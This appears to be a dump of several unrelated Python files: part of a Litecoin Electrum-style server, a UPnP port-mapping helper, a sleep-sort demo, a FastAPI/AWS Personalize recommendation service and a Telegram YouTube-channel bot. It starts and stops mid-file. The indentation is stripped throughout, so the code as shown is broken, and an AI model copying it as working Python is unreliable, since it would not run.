return
if result == -1:
self.queue.put((session, request))
else:
self.push_response(session, {'id': message_id, 'result': result})
def do_subscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session not in self.watch_blocks:
self.watch_blocks.append(session)
elif method == 'blockchain.headers.subscribe':
if session not in self.watch_headers:
self.watch_headers.append(session)
elif method == 'blockchain.address.subscribe':
address = params[0]
l = self.watched_addresses.get(address)
if l is None:
self.watched_addresses[address] = [session]
elif session not in l:
l.append(session)
def do_unsubscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session in self.watch_blocks:
self.watch_blocks.remove(session)
elif method == 'blockchain.headers.subscribe':
if session in self.watch_headers:
self.watch_headers.remove(session)
elif method == "blockchain.address.subscribe":
addr = params[0]
l = self.watched_addresses.get(addr)
if not l:
return
if session in l:
l.remove(session)
if session in l:
print_log("error rc!!")
self.shared.stop()
if l == []:
del self.watched_addresses[addr]
def process(self, request, cache_only=False):
message_id = request['id']
method = request['method']
params = request.get('params', ())
result = None
error = None
if method == 'blockchain.numblocks.subscribe':
result = self.storage.height
elif method == 'blockchain.headers.subscribe':
result = self.header
elif method == 'blockchain.address.subscribe':
address = str(params[0])
result = self.get_status(address, cache_only)
elif method == 'blockchain.address.get_history':
address = str(params[0])
result = self.get_history(address, cache_only)
elif method == 'blockchain.address.get_mempool':
address = str(params[0])
result = self.get_unconfirmed_history(address)
elif method == 'blockchain.address.get_balance':
address = str(params[0])
confirmed = self.storage.get_balance(address)
unconfirmed = self.get_unconfirmed_value(address)
result = { 'confirmed':confirmed, 'unconfirmed':unconfirmed }
elif method == 'blockchain.address.get_proof':
address = str(params[0])
result = self.storage.get_proof(address)
elif method == 'blockchain.address.listunspent':
address = str(params[0])
result = self.storage.listunspent(address)
elif method == 'blockchain.utxo.get_address':
txid = str(params[0])
pos = int(params[1])
txi = (txid + int_to_hex4(pos)).decode('hex')
result = self.storage.get_address(txi)
elif method == 'blockchain.block.get_header':
if cache_only:
result = -1
else:
height = int(params[0])
result = self.get_header(height)
elif method == 'blockchain.block.get_chunk':
if cache_only:
result = -1
else:
index = int(params[0])
result = self.get_chunk(index)
elif method == 'blockchain.transaction.broadcast':
try:
txo = self.bitcoind('sendrawtransaction', params)
print_log("sent tx:", txo)
result = txo
except BaseException as e:
error = e.args[0]
if error["code"] == -26:
# If we return anything that's not the transaction hash,
# it's considered an error message
message = error["message"]
if "non-mandatory-script-verify-flag" in message:
result = "Your client produced a transaction that is not accepted by the Litecoin network any more. Please upgrade to Electrum 2.5.1 or newer\n"
else:
result = "The transaction was rejected by network rules.(" + message + ")\n" \
"[" + params[0] + "]"
else:
result = error["message"] # do send an error
print_log("error:", result)
elif method == 'blockchain.transaction.get_merkle':
tx_hash = params[0]
tx_height = params[1]
result = self.get_merkle(tx_hash, tx_height, cache_only)
elif method == 'blockchain.transaction.get':
tx_hash = params[0]
result = self.bitcoind('getrawtransaction', (tx_hash, 0))
elif method == 'blockchain.estimatefee':
num = int(params[0])
result = self.bitcoind('estimatefee', (num,))
elif method == 'blockchain.relayfee':
result = self.relayfee
else:
raise BaseException("unknown method:%s" % method)
return result
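# Illustrative request/response (editor's sketch of the Electrum protocol handled above;
# the address placeholder and amounts are hypothetical):
#   request:  {'id': 7, 'method': 'blockchain.address.get_balance', 'params': ['<address>']}
#   process() returns {'confirmed': 150000000, 'unconfirmed': 0}, which add_request() wraps
#   as {'id': 7, 'result': {...}} before pushing it to the session.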
def get_block(self, block_hash):
block = self.bitcoind('getblock', (block_hash,))
rawtxreq = []
i = 0
for txid in block['tx']:
rawtxreq.append({
"method": "getrawtransaction",
"params": (txid,),
"id": i,
})
i += 1
postdata = dumps(rawtxreq)
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
logger.error("litecoind error (getfullblock)")
self.wait_on_bitcoind()
continue
try:
rawtxdata = []
for ir in r:
assert ir['error'] is None, "Error: make sure you run litecoind with txindex=1; use -reindex if needed."
rawtxdata.append(ir['result'])
except BaseException as e:
logger.error(str(e))
self.wait_on_bitcoind()
continue
block['tx'] = rawtxdata
return block
def catch_up(self, sync=True):
self.start_catchup_height = self.storage.height
prev_root_hash = None
n = 0
while not self.shared.stopped():
# are we done yet?
info = self.bitcoind('getinfo')
self.relayfee = info.get('relayfee')
self.bitcoind_height = info.get('blocks')
bitcoind_block_hash = self.bitcoind('getblockhash', (self.bitcoind_height,))
if self.storage.last_hash == bitcoind_block_hash:
self.up_to_date = True
break
self.set_time()
revert = (random.randint(1, 100) == 1) if self.test_reorgs and self.storage.height>100 else False
# not done..
self.up_to_date = False
try:
next_block_hash = self.bitcoind('getblockhash', (self.storage.height + 1,))
except BaseException as e:
revert = True
next_block = self.get_block(next_block_hash if not revert else self.storage.last_hash)
if (next_block.get('previousblockhash') == self.storage.last_hash) and not revert:
prev_root_hash = self.storage.get_root_hash()
n = self.import_block(next_block, next_block_hash, self.storage.height+1)
self.storage.height = self.storage.height + 1
self.write_header(self.block2header(next_block), sync)
self.storage.last_hash = next_block_hash
else:
# revert current block
block = self.get_block(self.storage.last_hash)
print_log("blockchain reorg", self.storage.height, block.get('previousblockhash'), self.storage.last_hash)
n = self.import_block(block, self.storage.last_hash, self.storage.height, revert=True)
self.pop_header()
self.flush_headers()
self.storage.height -= 1
# read previous header from disk
self.header = self.read_header(self.storage.height)
self.storage.last_hash = self.hash_header(self.header)
if prev_root_hash:
assert prev_root_hash == self.storage.get_root_hash()
prev_root_hash = None
# print time
self.print_time(n)
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
if self.shared.stopped():
print_log( "closing database" )
self.storage.close()
def memorypool_update(self):
t0 = time.time()
mempool_hashes = set(self.bitcoind('getrawmempool'))
touched_addresses = set()
# get new transactions
new_tx = {}
for tx_hash in mempool_hashes:
if tx_hash in self.mempool_hashes:
continue
tx = self.get_mempool_transaction(tx_hash)
if not tx:
continue
new_tx[tx_hash] = tx
# remove older entries from mempool_hashes
self.mempool_hashes = mempool_hashes
# check all tx outputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
out_values = []
out_sum = 0
for x in tx.get('outputs'):
addr = x.get('address', '')
value = x['value']
out_values.append((addr, value))
if not addr:
continue
v = mpa.get(addr, 0)
v += value
mpa[addr] = v
touched_addresses.add(addr)
out_sum += value
self.mempool_fees[tx_hash] = -out_sum
self.mempool_addresses[tx_hash] = mpa
self.mempool_values[tx_hash] = out_values
self.mempool_unconfirmed[tx_hash] = set()
# check all inputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
# are we spending unconfirmed inputs?
input_sum = 0
for x in tx.get('inputs'):
prev_hash = x.get('prevout_hash')
prev_n = x.get('prevout_n')
mpv = self.mempool_values.get(prev_hash)
if mpv:
addr, value = mpv[prev_n]
self.mempool_unconfirmed[tx_hash].add(prev_hash)
else:
txi = (prev_hash + int_to_hex4(prev_n)).decode('hex')
try:
addr = self.storage.get_address(txi)
value = self.storage.get_utxo_value(addr,txi)
except:
print_log("utxo not in database; postponing mempool update")
return
# we can proceed
input_sum += value
if not addr:
continue
v = mpa.get(addr, 0)
v -= value
mpa[addr] = v
touched_addresses.add(addr)
self.mempool_addresses[tx_hash] = mpa
self.mempool_fees[tx_hash] += input_sum
# remove deprecated entries from mempool_addresses
for tx_hash, addresses in self.mempool_addresses.items():
if tx_hash not in self.mempool_hashes:
del self.mempool_addresses[tx_hash]
del self.mempool_values[tx_hash]
del self.mempool_unconfirmed[tx_hash]
del self.mempool_fees[tx_hash]
touched_addresses.update(addresses)
# remove deprecated entries from mempool_hist
new_mempool_hist = {}
for addr in self.mempool_hist.iterkeys():
h = self.mempool_hist[addr]
hh = []
for tx_hash, delta in h:
if tx_hash in self.mempool_addresses:
hh.append((tx_hash, delta))
if hh:
new_mempool_hist[addr] = hh
# add new transactions to mempool_hist
for tx_hash in new_tx.iterkeys():
addresses = self.mempool_addresses[tx_hash]
for addr, delta in addresses.iteritems():
h = new_mempool_hist.get(addr, [])
if (tx_hash, delta) not in h:
h.append((tx_hash, delta))
new_mempool_hist[addr] = h
with self.mempool_lock:
self.mempool_hist = new_mempool_hist
# invalidate cache for touched addresses
for addr in touched_addresses:
self.invalidate_cache(addr)
t1 = time.time()
if t1-t0>1:
print_log('mempool_update', t1-t0, len(self.mempool_hashes), len(self.mempool_hist))
def invalidate_cache(self, address):
with self.cache_lock:
if address in self.history_cache:
# print_log("cache: invalidating", address)
del self.history_cache[address]
with self.watch_lock:
sessions = self.watched_addresses.get(address)
if sessions:
# TODO: update cache here. if new value equals cached value, do not send notification
self.address_queue.put((address,sessions))
def close(self):
self.blockchain_thread.join()
print_log("Closing database...")
self.storage.close()
print_log("Database is closed")
def main_iteration(self):
if self.shared.stopped():
print_log("Stopping timer")
return
self.catch_up()
self.memorypool_update()
if self.sent_height != self.storage.height:
self.sent_height = self.storage.height
for session in self.watch_blocks:
self.push_response(session, {
'id': None,
'method': 'blockchain.numblocks.subscribe',
'params': (self.storage.height,),
})
if self.sent_header != self.header:
self.sent_header = self.header
for session in self.watch_headers:
self.push_response(session, {
'id': None,
'method': 'blockchain.headers.subscribe',
'params': (self.header,),
})
while True:
try:
addr, sessions = self.address_queue.get(False)
except:
break
status = self.get_status(addr)
for session in sessions:
self.push_response(session, {
'id': None,
'method': 'blockchain.address.subscribe',
'params': (addr, status),
})
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "taco", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run taco, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
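# Illustrative usage (editor's sketch; the port number is hypothetical):
#
# upnp = UPnP()        # starts the worker thread and discovers the gateway
# upnp.remap(8444)     # ask the router to forward TCP 8444 to this host
# ...
# upnp.release(8444)   # remove the mapping when no longer needed
# upnp.shutdown()      # stop the worker thread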
|
sleep_sort.py
|
import time
import threading
# The sequence to sort (negative numbers are allowed)
num = [-5, 3, 9, 11, -1, 3, 12, 0, 8, -3, 23, 5, 19]
# Sleep worker: each value sleeps for a time derived from its magnitude, then prints itself
def doSleep(func):
co = 0.02  # scaling coefficient to keep the sleep times short
time.sleep(co * pow(1.1, float(func)))  # an exponential keeps the delay positive, so negative numbers sort correctly too
print(func)
# Store one thread per value in a list
thread_list = []
for i in range(len(num)):
temp = threading.Thread(target=doSleep, args=(str(num[i]), ))
thread_list.append(temp)
if __name__ == '__main__':
start = time.perf_counter()  # time.clock() was removed in Python 3.8
for t in thread_list:
t.start()  # start each worker thread
for t in thread_list:
t.join()  # wait for every worker thread before the main thread exits
end = time.perf_counter()
print('Elapsed:', str(end - start))
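# Editor's note on the delay formula: doSleep() waits 0.02 * 1.1**x seconds, which is
# positive and strictly increasing in x, so e.g. x = -5 sleeps ~0.012s, x = 0 sleeps 0.02s
# and x = 23 sleeps ~0.18s; the threads therefore wake (and print) in ascending order as
# long as the gaps exceed scheduling jitter.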
|
server.py
|
import logging
import math
import os
from threading import Thread
from typing import List
from fastapi import Request
import json
import boto3
import redis
import cache
import time
import requests
import uvicorn as uvicorn
from fastapi import FastAPI, Header, HTTPException
from fastapi.exceptions import RequestValidationError
from pydantic.main import BaseModel
from starlette.responses import JSONResponse
import datetime
app = FastAPI()
personalize_runtime = boto3.client('personalize-runtime', 'ap-northeast-1')
ps_config = {}
ps_result = "ps-result"
sleep_interval = 10  # seconds
MANDATORY_ENV_VARS = {
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'RETRIEVE_HOST': 'retrieve',
'RETRIEVE_PORT': '5600',
'FILTER_HOST': 'filter',
'FILTER_PORT': '5200',
'TEST': 'False',
'AWS_REGION': 'ap-northeast-1',
'S3_BUCKET': 'aws-gcr-rs-sol-demo-ap-southeast-1-522244679887',
'S3_PREFIX': 'sample-data',
'METHOD': 'customer'
}
class RSHTTPException(HTTPException):
def __init__(self, status_code: int, message: str):
super().__init__(status_code, message)
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.start()
return wrapper
@app.exception_handler(HTTPException)
async def rs_exception_handler(request: Request, rs_exec: HTTPException):
return JSONResponse(
status_code=rs_exec.status_code,
content={
"message": rs_exec.detail
}
)
@app.exception_handler(RequestValidationError)
async def validation_exception_handler(request, exc):
return JSONResponse(
status_code=405,
content={
"message": str(exc)
}
)
def get_data_request(url, get_data_func=None):
logging.info("GET request from :" + url)
if MANDATORY_ENV_VARS['TEST'] == 'True':
return [
{
"id": "1111",
"tag": "coldstart test",
"type": "1"
},
{
"id": "1112",
"tag": "coldstart test",
"type": "1"
}
]
r = requests.get(url)
logging.info("get response status_code:{}".format(r.status_code))
if r.status_code == 200:
logging.info(r.json())
if get_data_func is not None:
return get_data_func(r.json())
else:
return r.json()['data']
else:
if len(r.text) > 100:
logging.error(r.text[100:300])
else:
logging.error(r.text)
raise RSHTTPException(status_code=r.status_code, message="error GET request {}".format(url))
class Metadata(BaseModel):
type: str
class RSItem(BaseModel):
id: str
tags: List[str]
description: str
class Pagination(BaseModel):
curPage: int
pageSize: int
totalSize: int
totalPage: int
class RecommendList(BaseModel):
version: int = 1
metadata: Metadata
content: List[RSItem]
pagination: Pagination
@app.get('/ping', tags=["monitoring"])
def ping():
logging.info('Processing default request...')
return {'result': 'ping'}
@app.get('/api/v1/retrieve/{user_id}', response_model=RecommendList, tags=["retrieve"])
def retrieve_get_v2(user_id: str, curPage: int = 0, pageSize: int = 20, regionId=Header("0"),
recommendType: str = 'recommend'):
logging.info("retrieve_get_v2() enter")
if recommendType == "recommend" and MANDATORY_ENV_VARS['METHOD'] == "ps-complete":
item_list = get_recommend_from_personalize(user_id)
else:
item_list = get_recommend_from_default(user_id, recommendType)
it_list = [RSItem(id=str(it['id']), description=str(it['description']), tags=str(it["tag"]).split(" ")) for it in
item_list]
it_list_paged = it_list[curPage * pageSize: (curPage + 1) * pageSize]
total_page = math.ceil(len(it_list) / pageSize)
content = it_list_paged
pagination = Pagination(curPage=curPage, pageSize=pageSize,
totalSize=len(it_list),
totalPage=total_page)
rs_list = RecommendList(
metadata=Metadata(type="RecommendList"),
content=content,
pagination=pagination
)
logging.info("rs_list: {}".format(rs_list))
print("---------time finish retrieve:")
print(datetime.datetime.now())
return rs_list
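# Illustrative call (editor's sketch; the user id and item fields are hypothetical):
#   GET /api/v1/retrieve/42?curPage=0&pageSize=20
# returns a RecommendList such as
#   {"version": 1, "metadata": {"type": "RecommendList"},
#    "content": [{"id": "1111", "tags": ["coldstart", "test"], "description": "..."}],
#    "pagination": {"curPage": 0, "pageSize": 20, "totalSize": 1, "totalPage": 1}}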
# ## only for news
# @app.get('/api/v1/retrieve/{user_id}', response_model=RecommendList, tags=["retrieve"])
# def retrieve_get_v1(user_id: str, curPage: int = 0, pageSize: int = 20, regionId=Header("0")):
# logging.info("retrieve_get_v1() enter")
# host = MANDATORY_ENV_VARS['FILTER_HOST']
# port = MANDATORY_ENV_VARS['FILTER_PORT']
# content_dict = {}
# pagenation_dict = {}
#
# sub_types = ["recommend"]
#
# for type in sub_types:
# svc_url = "http://{}:{}/filter/get_recommend_data?userId={}&recommendType={}" \
# .format(host, port, user_id, type)
#
# logging.info("svc_url:{}".format(svc_url))
# item_list = get_data_request(svc_url, lambda json_data: json_data['data'])
#
# it_list = [RSItem(id=str(it['id']), tags=str(it["tag"]).split(" ")) for it in item_list]
# it_list_paged = it_list[curPage * pageSize: (curPage + 1) * pageSize]
# total_page = math.ceil(len(it_list) / pageSize)
#
# content_dict[type] = it_list_paged
# pagenation_dict[type] = Pagination(curPage=curPage, pageSize=pageSize,
# totalSize=len(it_list),
# totalPage=total_page)
#
# rs_list = RecommendList(
# metadata=Metadata(type="RecommendList", subtype=sub_types),
# content=content_dict,
# pagination=pagenation_dict
# )
#
# logging.info("rs_list: {}".format(rs_list))
# return rs_list
def get_recommend_from_default(user_id, recommend_type):
logging.info('send request to filter to get recommend data...')
host = MANDATORY_ENV_VARS['FILTER_HOST']
port = MANDATORY_ENV_VARS['FILTER_PORT']
svc_url = "http://{}:{}/filter/get_recommend_data?userId={}&recommendType={}" \
.format(host, port, user_id, recommend_type)
logging.info("svc_url:{}".format(svc_url))
return get_data_request(svc_url, lambda json_data: json_data['data'])
def get_recommend_from_personalize(user_id):
item_list = []
# trigger personalize api
get_recommendations_response = personalize_runtime.get_recommendations(
campaignArn=ps_config['CampaignArn'],
userId=str(user_id),
)
result_list = get_recommendations_response['itemList']
for item in result_list:
item_list.append({
"id": item['itemId'],
"description": 'personalize|{}'.format(str(item['score'])),
"tag": 'recommend'
})
return item_list
@xasync
def read_ps_config_message():
logging.info('read_ps_message start')
# Read existed stream message
stream_message = rCache.read_stream_message(ps_result)
if stream_message:
logging.info("Handle existed stream ps-result message")
handle_stream_message(stream_message)
while True:
logging.info('wait for reading ps-result message')
localtime = time.asctime( time.localtime(time.time()))
logging.info('start read stream: time: {}'.format(localtime))
try:
stream_message = rCache.read_stream_message_block(ps_result)
if stream_message:
handle_stream_message(stream_message)
except redis.ConnectionError:
localtime = time.asctime( time.localtime(time.time()))
logging.info('get ConnectionError, time: {}'.format(localtime))
time.sleep( sleep_interval )
def handle_stream_message(stream_message):
logging.info('get stream message from {}'.format(stream_message))
file_type, file_path, file_list = parse_stream_message(stream_message)
logging.info('start reload data process in handle_stream_message')
logging.info('file_type {}'.format(file_type))
logging.info('file_path {}'.format(file_path))
logging.info('file_list {}'.format(file_list))
global ps_config
for file_name in file_list:
if MANDATORY_ENV_VARS.get('PS_CONFIG', 'ps_config.json') in file_name:  # PS_CONFIG has no default above; fall back to the config file name used in init()
logging.info("reload config file: {}".format(file_name))
ps_config = load_config(file_name)
def parse_stream_message(stream_message):
for stream_name, message in stream_message:
for message_id, value in message:
decode_value = convert(value)
file_type = decode_value['file_type']
file_path = decode_value['file_path']
file_list = decode_value['file_list']
return file_type, file_path, file_list
# convert stream data to str
def convert(data):
if isinstance(data, bytes):
return data.decode('ascii')
elif isinstance(data, dict):
return dict(map(convert, data.items()))
elif isinstance(data, tuple):
return map(convert, data)
else:
return data
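# Illustrative example (editor's sketch; the values are hypothetical): convert() turns a raw
# redis stream value such as {b'file_type': b'ps-config', b'file_path': b'notification'} into
# {'file_type': 'ps-config', 'file_path': 'notification'} by decoding bytes as ASCII and
# recursing into dicts and tuples.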
def load_config(file_path):
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
file_key = '{}/{}'.format(s3_prefix, file_path)
s3 = boto3.resource('s3')
try:
object_str = s3.Object(s3_bucket, file_key).get()[
'Body'].read().decode('utf-8')
except Exception as ex:
logging.info("get {} failed, error:{}".format(file_key, ex))
object_str = "{}"
config_json = json.loads(object_str)
return config_json
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error("Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var] = str(os.environ.get(var))
global rCache
rCache = cache.RedisCache(host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
global personalize_runtime
personalize_runtime = boto3.client('personalize-runtime', MANDATORY_ENV_VARS['AWS_REGION'])
global ps_config
ps_file_path = "system/personalize-data/ps-config/ps_config.json"
ps_config = load_config(ps_file_path)
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%Y-%m-%d:%H:%M:%S',
level=logging.INFO)
init()
uvicorn.run(app, host="0.0.0.0", port=int(MANDATORY_ENV_VARS['RETRIEVE_PORT']))
|
content_bot.py
|
import datetime as dt
import os
import sqlite3
import threading
from time import sleep
import requests
import telebot
from dotenv import load_dotenv
from loguru import logger
from telebot import types
load_dotenv()
logger.add(
"bot_debug.log",
format="{time} {level} {message}",
level="DEBUG",
rotation="10 MB",
retention="7 days",
compression="zip",
)
TELEGRAM_TOKEN = os.getenv("TELEGRAM_TOKEN")
TELEGRAM_CHAT_ID = os.getenv("TELEGRAM_CHAT_ID")
GOOGLE_API_KEY = os.getenv("GOOGLE_API_KEY")
BOT = telebot.TeleBot(TELEGRAM_TOKEN)
PHOTO_GOBLIN_HELLO = (
"https://www.meme-arsenal.com/memes/990b461fea0832a44ab4f588e6cf37e0.jpg"
)
PHOTO_PEPE_THINKING = (
"https://www.meme-arsenal.com/memes/8b3ef2c65d5763539e34a9bd5bff7b9d.jpg"
)
PHOTO_ERIC_THINKING = "https://i.ytimg.com/vi/yDly4gmLLHg/mqdefault.jpg"
GET_CHANNEL_BY_USERNAME = (
"https://youtube.googleapis.com/youtube/v3/"
"channels?part=snippet&forUsername="
)
GET_CHANNEL_BY_ID = (
"https://youtube.googleapis.com/youtube/v3/channels?part=snippet&id="
)
SEARCH_VIDEO_BY_CHANNEL_ID = (
"https://www.googleapis.com/youtube/v3/"
"search?order=date&part=snippet&channelId="
)
SEARCH_BROKEN_CHANNEL = (
"https://youtube.googleapis.com/youtube/v3/"
"search?part=snippet&maxResults=5&q="
)
GET_CHANNEL_ID_FROM_VIDEO = (
"https://youtube.googleapis.com/youtube/v3/videos?part=snippet&id="
)
YOUTUBE_URL = "https://www.youtube.com/watch?v="
DATE_FORMAT = "%d.%m.%Y"
__connection = None
@logger.catch
def get_connection():
"""Функция подключения к базе данных"""
global __connection
if __connection is None:
__connection = sqlite3.connect("channels.db", check_same_thread=False)
return __connection
@logger.catch
def init_db(force: bool = False):
"""Функция создания БД"""
conn = get_connection()
c = conn.cursor()
if force:
c.execute("DROP TABLE IF EXISTS channel_list")
c.execute(
"""
CREATE TABLE IF NOT EXISTS channel_list (
id INTEGER PRIMARY KEY,
title TEXT,
url TEXT,
video_url,
rating INTEGER
)
"""
)
conn.commit()
@logger.catch
@BOT.message_handler(commands=["start"])
def start_message(message):
"""Функция приветствует юзера и предлагает продолжить работу"""
BOT.send_photo(
message.chat.id,
photo=PHOTO_GOBLIN_HELLO,
caption=f"Привет, калтэнтеры!\n"
f"Сегодня {dt.date.today().strftime(DATE_FORMAT)}\n"
"Cмотрите описание бота и используйте команды.\n",
)
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="🐾 Продолжить"))
msg = BOT.send_message(message.chat.id, "Продолжаем?", reply_markup=markup)
BOT.register_next_step_handler(msg, process_step)
@logger.catch
@BOT.message_handler(commands=["menu"])
def selects_actions(message):
"""Функция отображает все кнопки меню и предлагает выбрать действие"""
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="🍻 Смотреть контент"))
markup.add(types.InlineKeyboardButton(text="📀 Добавить видео"))
markup.add(types.InlineKeyboardButton(text="📹 Добавить канал"))
markup.add(types.InlineKeyboardButton(text="👀 Показать все видео"))
markup.add(types.InlineKeyboardButton(text="👀 Показать все каналы"))
msg = BOT.send_photo(
message.chat.id,
photo=PHOTO_PEPE_THINKING,
caption="Чего желаете?",
reply_markup=markup,
)
BOT.register_next_step_handler(msg, process_step)
@logger.catch
@BOT.message_handler(content_types=["text"])
def process_step(message, video_url=None):
"""Функция распределяет дальнейшие действия в зависимости
от условия полученной команды"""
if message.text == "🍻 Смотреть контент":
BOT.send_message(
message.chat.id, "Начинаем просмотр, хорошей зачилки."
)
sleep(1)
post_videos_to_watch(message)
elif message.text == "📀 Добавить видео":
add_url_new_videos(message)
elif message.text == "🐾 Продолжить":
selects_actions(message)
elif message.text == "👀 Показать все каналы":
show_all_channels(message)
elif message.text == "📹 Добавить канал":
add_channel_url(message)
elif message.text == "❌ Удалить канал":
query_delete_channel(message)
elif message.text == "👉 Отложить видео":
deferral_video(message, video_url)
elif message.text == "❌ Удалить видео":
delete_video(message, video_url)
elif message.text == "👉 Следующее видео":
post_videos_to_watch(message)
elif message.text == "👈 Вернуться в меню":
selects_actions(message)
elif message.text == "👀 Показать все видео":
show_all_videos(message)
elif message.text == "/start":
start_message(message)
elif message.text == "/menu":
selects_actions(message)
@logger.catch
def show_all_videos(message):
"""Функция показывает все имеющиеся видео в БД"""
conn = get_connection()
c = conn.cursor()
c.execute(
"SELECT DISTINCT(video_url)\
FROM channel_list\
WHERE video_url NOT NULL\
ORDER BY rating DESC"
)
(urls) = c.fetchall()
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
if urls:
all_urls = []
for url in urls:
all_urls.append("".join(url))
for url in all_urls:
BOT.send_message(message.chat.id, url)
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
BOT.send_message(
message.chat.id,
"Список окончен. Выберите действие:",
reply_markup=markup,
)
else:
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
BOT.send_message(message.chat.id, "Нет видео.", reply_markup=markup)
@logger.catch
def show_all_channels(message):
"""Функция показывает все имеющиеся каналы в БД"""
conn = get_connection()
c = conn.cursor()
c.execute(
"SELECT DISTINCT(title)\
FROM channel_list\
WHERE title NOT NULL AND url NOT NULL\
ORDER BY rating DESC"
)
(channel_names) = c.fetchall()
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
markup.add(types.InlineKeyboardButton(text="📹 Добавить канал"))
markup.add(types.InlineKeyboardButton(text="❌ Удалить канал"))
markup.add(types.InlineKeyboardButton(text="👈 Вернуться в меню"))
if channel_names:
BOT.send_message(message.chat.id, "Список всех каналов:\n")
for name in channel_names:
BOT.send_message(message.chat.id, f"{''.join(name)}")
BOT.send_message(
message.chat.id,
"Список окончен. Выберите действие:",
reply_markup=markup,
)
else:
BOT.send_message(message.chat.id, "У вас не добавлены каналы.")
BOT.register_next_step_handler(message, selects_actions)
@logger.catch
def add_channel_url(message):
"""Функция ожидает ссылку на канал и переходит к функции
ввода рейтинга для канала"""
msg = BOT.send_message(message.chat.id, "Введите ссылку на канал.")
BOT.register_next_step_handler(msg, add_channel_raiting)
@logger.catch
def add_channel_raiting(message):
"""Функция проверяет корректность ссылки на канал, если всё верно,
то переходит к следующей функции добавления канала"""
if message.text.startswith(
"https://www.youtube.com/"
) or message.text.startswith("https://youtube.com/"):
msg = BOT.send_message(
message.chat.id,
"Введите рейтинг канала от 1 до 10\n"
"Видео будут упорядочены по рейтингу канала.",
)
channel_url = message.text
BOT.register_next_step_handler(msg, add_channel, channel_url)
else:
BOT.send_message(
message.chat.id, "Вы ввели неправильные данные, начните заново."
)
@logger.catch
def add_channel(message, channel_url):
"""Функция Добавляет новый канала в БД"""
conn = get_connection()
c = conn.cursor()
try:
if (
(channel_url.startswith("https://www.youtube.com/")
or channel_url.startswith("https://youtube.com/"))
and 0 < int(message.text) <= 10
):
BOT.send_photo(
message.chat.id,
photo=PHOTO_ERIC_THINKING,
caption="Я думаю...",
)
rating = message.text
if len(channel_url.split("/")):
cut_link = channel_url.split("/")[4:]
eng_channel_name = cut_link[0]
name_length = len(eng_channel_name)
if name_length < 24:
response = requests.get(
GET_CHANNEL_BY_USERNAME
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
else:
response = requests.get(
GET_CHANNEL_BY_ID
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
sleep(1)
if "items" not in response:
response = requests.get(
SEARCH_BROKEN_CHANNEL
+ eng_channel_name
+ "&key="
+ GOOGLE_API_KEY
)
channel_name = response.json()["items"][0]["snippet"][
"channelTitle"
]
else:
channel_name = response.json()["items"][0]["snippet"]["title"]
c.execute(
"SELECT DISTINCT(title)\
FROM channel_list\
WHERE title NOT NULL\
ORDER BY rating DESC"
)
(all_channels) = c.fetchall()
channels_name = []
for name in all_channels:
channels_name.append("".join(name))
if channel_name not in channels_name:
c.execute(
"INSERT INTO channel_list(url, title, rating)\
VALUES (?, ?, ?);",
(channel_url, channel_name, rating),
)
markup = types.ReplyKeyboardMarkup(
one_time_keyboard=True, resize_keyboard=True
)
BOT.send_message(
message.chat.id,
f"Канал '{channel_name}' добавлен в базу.",
reply_markup=markup,
)
markup.add(
types.InlineKeyboardButton(text="👈 Вернуться в меню")
)
conn.commit()
else:
